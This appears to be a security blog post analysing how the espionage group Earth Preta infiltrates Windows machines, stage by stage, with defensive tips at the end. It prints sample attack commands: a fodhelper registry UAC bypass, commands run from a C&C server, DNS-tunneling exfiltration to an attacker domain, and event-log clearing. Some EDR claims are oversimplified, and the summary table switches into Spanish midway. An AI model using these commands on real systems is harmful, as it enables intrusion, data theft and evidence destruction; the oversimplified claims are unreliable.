A sophisticated cyberespionage group known as Earth Preta (also called Mustang Panda) has been identified using advanced techniques to infiltrate systems and evade detection. Their stealthy approach involves leveraging legitimate Windows utilities to execute malicious payloads, making it difficult for Endpoint Detection and Response (EDR) systems such as CrowdStrike, Carbon Black, and Sophos, as well as Microsoft Defender, to detect their presence.
This research provides an in-depth technical analysis of how Earth Preta infiltrates machines, escalates privileges, maintains persistence, and steals sensitive data while avoiding cybersecurity defenses.
Earth Preta, also known as Mustang Panda, is a sophisticated advanced persistent threat (APT) group recognized for its cyberespionage activities, primarily targeting government entities and organizations across the Asia-Pacific (APAC) region. Their operations have evolved over time, employing advanced techniques to infiltrate systems, evade detection, and maintain prolonged access to compromised networks.
Evolution of Tactics
Earth Preta’s tactics have continually evolved to enhance their infiltration capabilities and persistence within target networks. In campaigns dating back to 2022, the group extensively utilized spear-phishing emails to deliver malware. These emails often contained links to malicious files hosted on platforms like Google Drive. The malicious payloads were typically archived in formats such as RAR, ZIP, or JAR files. Upon execution, these payloads would deploy malware families like TONEINS, TONESHELL, and PUBLOAD, which facilitated further compromise of the target systems.
In subsequent operations, Earth Preta expanded their toolkit to include new malware variants and propagation methods. Notably, they began using a worm-like malware known as HIUPAN to propagate their payloads via removable drives. This approach allowed the malware to spread more widely and persistently across networks, even in environments with stringent email security measures. The HIUPAN worm was configured to install itself on a system and create autorun registry entries to maintain persistence. It also modified system registry settings to conceal its presence, making detection and removal more challenging.
Target Profile and Objectives
Earth Preta’s targeting has been diverse, focusing on various sectors and regions. While their operations have a global reach, there is a pronounced emphasis on entities within the APAC region. Their targets have included government agencies, academic institutions, research organizations, and foundations. The group’s objectives appear to center on the acquisition of sensitive information, intellectual property, and strategic data that could serve geopolitical interests. For example, in campaigns observed in 2022, Earth Preta targeted government entities and organizations involved in international relations, aiming to gather intelligence on geopolitical developments.
In more recent campaigns, Earth Preta has demonstrated adaptability by shifting their focus to sectors such as maritime operations, shipping, border control, and immigration agencies. This shift suggests a strategic realignment to areas of emerging interest, possibly in response to global events or changing intelligence priorities. The group’s ability to modify their targeting and techniques underscores their commitment to maintaining relevance and effectiveness in their cyberespionage efforts.
Step 1: Initial Compromise – Spear Phishing with Malicious Attachments
One of Earth Preta’s primary attack vectors is spear phishing. The attackers send emails with an infected attachment, usually in the form of a RAR, ZIP, or JAR archive. These archives contain an executable file masquerading as a PDF (e.g., Report.pdf.exe), tricking users into opening it.
Why EDR or Defender Might Not Detect This
- Polymorphic malware: The executable payload constantly changes to evade signature-based detection.
- File extension trickery: Many security tools rely on file extensions to determine if a file is malicious, and double extensions often bypass these controls.
- No exploit needed: The attack relies on social engineering rather than software vulnerabilities, making it harder to flag.
Step 2: Establishing Persistence – Hiding in Trusted System Processes
Once executed, the malware ensures it survives system reboots and security scans by hiding in legitimate Windows processes.
Example: Using MAVInject.exe for Code Injection
- MAVInject.exe is a legitimate Windows utility that allows injecting code into running processes.
- Earth Preta injects their malware into
waitfor.exe, a native Windows process, allowing the malware to run discreetly.
Why EDR or Defender Might Not Detect This
- Process injection bypasses direct execution monitoring.
- MAVInject.exe is a Microsoft-signed tool, making it inherently trusted.
- No suspicious activity in logs, since
waitfor.exeappears to function normally.
Step 3: Escalating Privileges – Bypassing User Account Control (UAC)
To gain administrator privileges, Earth Preta exploits Windows auto-elevation features to bypass UAC.
Example: Exploiting Fodhelper.exe
- The malware modifies the registry to make
fodhelper.exeexecute their payload with elevated privileges. - The attacker runs:
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /ve /t REG_SZ /d "C:\malicious_payload.exe" /f fodhelper.exeWindows executes the payload with admin rights.
Why EDR or Defender Might Not Detect This
- Fodhelper.exe is a trusted Windows binary.
- No direct exploit, just registry changes.
- Process execution appears normal.
Step 4: Installing a Backdoor – Deploying TONESHELL
After obtaining elevated privileges, the attacker installs TONESHELL, a backdoor that provides long-term access to the compromised system.
Example: DLL Sideloading via a Legitimate Application
- Earth Preta places a malicious DLL (
TONESHELL.dll) inside the folder of a trusted software, such as an Electronic Arts game updater. - When the legitimate
Updater.exeruns, it automatically loads the malicious DLL, activating the backdoor.
Why EDR or Defender Might Not Detect This
- EDR primarily scans executables, not DLLs.
- The legitimate software initiates the attack, avoiding red flags.
- TONESHELL communicates with command-and-control (C&C) servers using encrypted traffic.
Step 5: Gaining Remote Control – Executing Commands via C&C Server
Once inside, the attacker controls the infected machine remotely.
Example: Sending Commands from a C&C Server
- The compromised system connects to:
hxxp://malicious-server.com/control - The attacker retrieves system details:
tasklist /v - They execute file transfers:
copy C:\Users\victim\Documents\secrets.docx C:\Temp\ - To execute additional malware:
start C:\Temp\stealer.exe
Why EDR or Defender Might Not Detect This
- Encrypted communications with C&C servers evade firewalls.
- Commands appear as normal system activities.
- Attackers use compromised domains to avoid blacklisting.
Step 6: Stealing Data – Using DNS Tunneling for Exfiltration
Instead of using HTTP or FTP, which may be blocked, the malware hides stolen data inside DNS requests.
Example: Data Exfiltration via DNS Requests
nslookup stolen_data.secret.com
- This sends stolen files encoded within a DNS query to an external attacker-controlled domain.
Why EDR or Defender Might Not Detect This
- Firewalls rarely block DNS requests.
- Looks like a normal domain lookup.
Step 7: Covering Tracks – Deleting Logs and Artifacts
Before leaving, Earth Preta erases all traces of their attack.
Example: Clearing Windows Event Logs
wevtutil cl System
- Deletes security logs, preventing forensic analysis.
Why EDR or Defender Might Not Detect This
- Log clearing is a common administrative action.
- Executed from a legitimate Windows process.
Conclusion: How Earth Preta Remains Undetected
| Step | Evasion Technique | Why EDR/Defender Misses It? |
|---|---|---|
| 1. Phishing | Fake PDFs with double extensions | No exploit, just execution |
| 2. Persistencia | Inyección en waitfor.exe | Se oculta en un proceso confiable |
| 3. Escalada de privilegios | Bypass UAC (fodhelper.exe) | Cambios de registro, no exploits |
| 4. Backdoor | DLL sideloading | No hay ejecutables sospechosos |
| 5. Control remoto | Uso de procesos confiables | tasklist, copy parecen legítimos |
| 6. Exfiltración | DNS tunneling | Tráfico DNS no es monitoreado |
| 7. Eliminación de huellas | Limpieza de logs | Acción administrativa común |
How to Defend Against Earth Preta
✅ Monitor process injections ✅ Detect unusual DLL loads ✅ Inspect DNS traffic for anomalies ✅ Restrict PowerShell and MAVInject.exe ✅ Train employees on phishing attacks
Earth Preta is a stealthy APT group, but organizations can defend against their techniques by implementing advanced behavioral monitoring and network security controls.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.
